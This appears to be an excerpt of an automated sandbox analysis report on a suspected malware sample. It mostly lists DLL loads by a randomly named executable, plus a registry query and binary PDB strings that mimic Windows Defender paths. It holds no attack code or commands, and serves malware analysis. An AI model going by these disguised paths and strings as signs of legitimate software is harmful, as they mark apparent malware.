Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: winscard.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: devobj.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: sensapi.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: dbghelp.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: netapi32.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: samcli.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: netutils.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: dnsapi.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: windows.storage.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: wldp.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: iertutil.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: winhttp.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: mswsock.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: winnsi.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: rasadhlp.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: urlmon.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: srvcli.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: winscard.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: devobj.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: sensapi.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: dbghelp.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: netapi32.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: samcli.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: netutils.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: dnsapi.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: windows.storage.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: wldp.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: iertutil.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: winhttp.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: mswsock.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: winnsi.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: rasadhlp.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: urlmon.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: srvcli.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: winscard.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: devobj.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: sensapi.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: dbghelp.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: netapi32.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: samcli.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: netutils.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: dnsapi.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: windows.storage.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: wldp.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: iertutil.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: winhttp.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: mswsock.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: winscard.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: devobj.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: sensapi.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: dbghelp.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: netapi32.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: samcli.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: netutils.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: dnsapi.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: windows.storage.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: wldp.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: iertutil.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: winhttp.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: mswsock.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: winnsi.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: rasadhlp.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: urlmon.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: srvcli.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: winscard.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: devobj.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: sensapi.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: dbghelp.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: netapi32.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: samcli.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: netutils.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: dnsapi.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: windows.storage.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: wldp.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: iertutil.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: winhttp.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: mswsock.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: winnsi.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: rasadhlp.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: urlmon.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: srvcli.dll
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exeSection loaded: schannel.dll
Source: C:\Users\user\Desktop\UMwpXhA46R.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{304CE942-6E39-40D8-943A-B913C40C9CD4}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: UMwpXhA46R.exeStatic file information: File size 1179648 > 1048576
Source: UMwpXhA46R.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\wkernel32.pdb source: svchost.exe, 00000002.00000002.3427392798.000000000927C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\dll\wntdll.pdb source: svchost.exe, 00000002.00000002.3426848307.0000000009259000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winsta.pdb source: svchost.exe, 00000002.00000002.3422148486.0000000004382000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdb source: svchost.exe, 00000002.00000002.3426848307.0000000009271000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427813652.00000000092A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\symbols\dll\wrpcrt4.pdb\??\C:\Program Files (x86)\Windows Defender\symbols\dll\wntdll.pdb source: svchost.exe, 00000002.00000002.3426602006.0000000009206000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\winsta.pdb source: svchost.exe, 00000002.00000002.3427392798.0000000009288000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: com.qedyvap\??\C:\Program Files (x86)\Windows Defender\DLL\wkernel32.pdb source: svchost.exe, 00000002.00000002.3427876534.00000000092B8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\gacyfeb.com\??\C:\Program Files (x86)\Windows Defender\wntdll.pdb source: svchost.exe, 00000002.00000002.3427392798.0000000009288000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WinSCard.pdb\WinSCard.pdb source: svchost.exe, 00000002.00000002.3419194854.0000000003378000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: com.qegynul\??\C:\Program Files (x86)\Windows Defender\DLL\wkernel32.pdbb source: svchost.exe, 00000002.00000002.3427876534.00000000092B8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wrpcrt4.pdb source: svchost.exe, 00000002.00000002.3421903093.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3426602006.0000000009228000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\symbols\dll\WinSCard.pdbdb source: svchost.exe, 00000002.00000002.3413102831.000000000088A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wrpcrt4.pdb( source: svchost.exe, 00000002.00000002.3426602006.0000000009228000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdbwkernel32.pdb source: svchost.exe, 00000002.00000002.3419194854.0000000003378000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files (x86)\Windows Defender\dll\WinSCard.pdbdb source: svchost.exe, 00000002.00000002.3427876534.00000000092B8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbll\wntdll.pdb source: svchost.exe, 00000002.00000002.3419194854.0000000003378000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-amd64-cygwin\jdk8u281\880\build\windows-amd64\deploy\tmp\javacplexec\obj64\javacpl.pdb552 source: UMwpXhA46R.exe, svchost.exe.0.dr
Source: Binary string: WinSCard.pdb( source: svchost.exe, 00000002.00000002.3424625782.0000000007237000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-amd64-cygwin\jdk8u281\880\build\windows-amd64\deploy\tmp\javacplexec\obj64\javacpl.pdb source: UMwpXhA46R.exe, svchost.exe.0.dr
